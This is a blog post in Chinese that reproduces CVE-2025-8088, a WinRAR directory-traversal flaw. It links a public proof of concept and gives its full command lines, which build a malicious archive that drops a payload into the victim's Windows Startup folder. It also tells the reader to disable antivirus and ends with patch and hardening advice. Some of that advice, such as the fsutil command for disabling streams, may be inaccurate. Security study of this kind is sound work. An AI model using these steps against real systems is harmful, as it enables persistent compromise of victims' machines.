CVE-2025-8088-winrar

CVE-2025-8088-winrar

_

漏洞概述

7.12及以下版本的WinRAR软件存在目录穿越漏洞,在知道“用户文件夹名”或者其他信息的前提下,攻击者可以构造恶意压缩包,并诱导受害者解压,进而将恶意文件释放到任意位置(如开机启动目录,但需要满足权限要求),甚至获得目标的控制权限。2025年7月30日,WinRAR发布了针对该漏洞(编号CVE-2025-8088)的修复程序,版本为7.13。

漏洞环境

可见我的winrar版本<=7.12

poc

https://github.com/sxyrxyy/CVE-2025-8088-WinRAR-Proof-of-Concept-PoC-Exploit-

使用方法

python poc.py --decoy resume.txt --payload payload.bat --drop "C:\Users\you\Documents" --rar "C:\Program Files\WinRAR\rar.exe"
  • –decoy 参数 放的是钓鱼文件,就是解压缩后的文件
  • –paylod 放的是可执行病毒文件
  • –drop 放落地路径
  • –rar winrar的可执行文件路径

落地路径可以改成启动文件夹

C:\Users\用户名\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

开始复现

开始前关闭所有杀毒软件,防止影响

准备可执行文件payload

@echo off
chcp 65001 >nul
title 系统安全警告
mode con cols=50 lines=15
color 4F

cls
echo.
echo ****************************************************
echo *                                                  *
echo *              系统安全警报                         *
echo *                                                  *
echo *         检测到严重的安全威胁!                   *
echo *                                                  *
echo *     您的计算机已被病毒感染!!!                 *
echo *                                                  *
echo *        所有文件将在30秒内被删除                  *
echo *                                                  *
echo ****************************************************
echo.
echo 威胁等级: [%%%%%%%%%%%%%%%%%%%%] 100%% 危险
echo.
echo 按任意键关闭此警告...
pause >nul

还有钓鱼文件1.txt

在poc路径执行

python3 poc.py --decoy 1.txt --payload payload.bat --drop "C:\Users\用户名\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" --rar "C:\Program Files\WinRAR\rar.exe"

python3 poc.py --decoy 1.txt --payload winrar.exe --drop "C:\Users\huangzonghui\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" --rar "C:\Program Files\WinRAR\rar.exe"

执行结果

产生一个cve-2025-8088-sxy-poc.rar文件

使用winrar解压文件

注意:有的目录可能解压报错

这种情况你就将rar文件复制到桌面再解压

解压结果

可见执行成功

漏洞危害与防护建议

漏洞核心危害

  • 隐蔽性极强:恶意文件通过 ADS 隐藏在正常文件中,用户无法通过常规方式察觉。
  • 无需交互:仅需用户解压压缩包,无需点击额外文件,攻击门槛极低。
  • 危害范围广:可覆盖系统文件、植入启动项、触发蓝屏,甚至完全控制目标机。

紧急防护措施

  1. 立即更新 WinRAR:这是最根本的防护手段!前往 WinRAR 官网(https://www.winrar.com.cn/)下载并安装 7.13 及以上版本,官方已修复该漏洞。

  2. 禁用 NTFS ADS 特性:通过组策略或命令禁用 ADS(适合企业环境),命令如下:

fsutil behavior set disable8dot3 1  # 禁用短文件名,间接限制 ADS 滥用
fsutil behavior set streams 1  # 禁用 ADS(部分系统支持)
  1. 谨慎解压未知压缩包:不打开来历不明的钓鱼邮件附件、论坛下载的 RAR 压缩包;解压前用杀毒软件扫描。

  2. 监控系统关键目录:定期检查启动目录(Startup)、系统配置目录(C:\Windows\System32\config),发现异常文件及时删除。

开启安全软件实时防护:主流杀毒软件(如 360、火绒)已更新对该漏洞利用的检测规则,确保实时防护开启。

免责声明
本文所有复现操作均基于 授权的虚拟机环境,仅用于网络安全学习与漏洞原理研究。严禁将漏洞利用技术用于未授权的第三方系统,否则将触犯《中华人民共和国网络安全法》《刑法》等相关法律法规,承担法律责任。网络安全的核心是 “防护”,而非 “攻击”,请始终遵守网络安全伦理与法律底线。

参考链接

https://blog.csdn.net/m0_73610345/article/details/151190831
https://www.cnblogs.com/solitude1223/p/19073390
https://bbs.kanxue.com/thread-288363.htm

apache_shiro (CVE-2016-4437)反序列化漏洞复现 2026-01-09
CVE-2025-55182的复现与修复 2026-01-09

评论区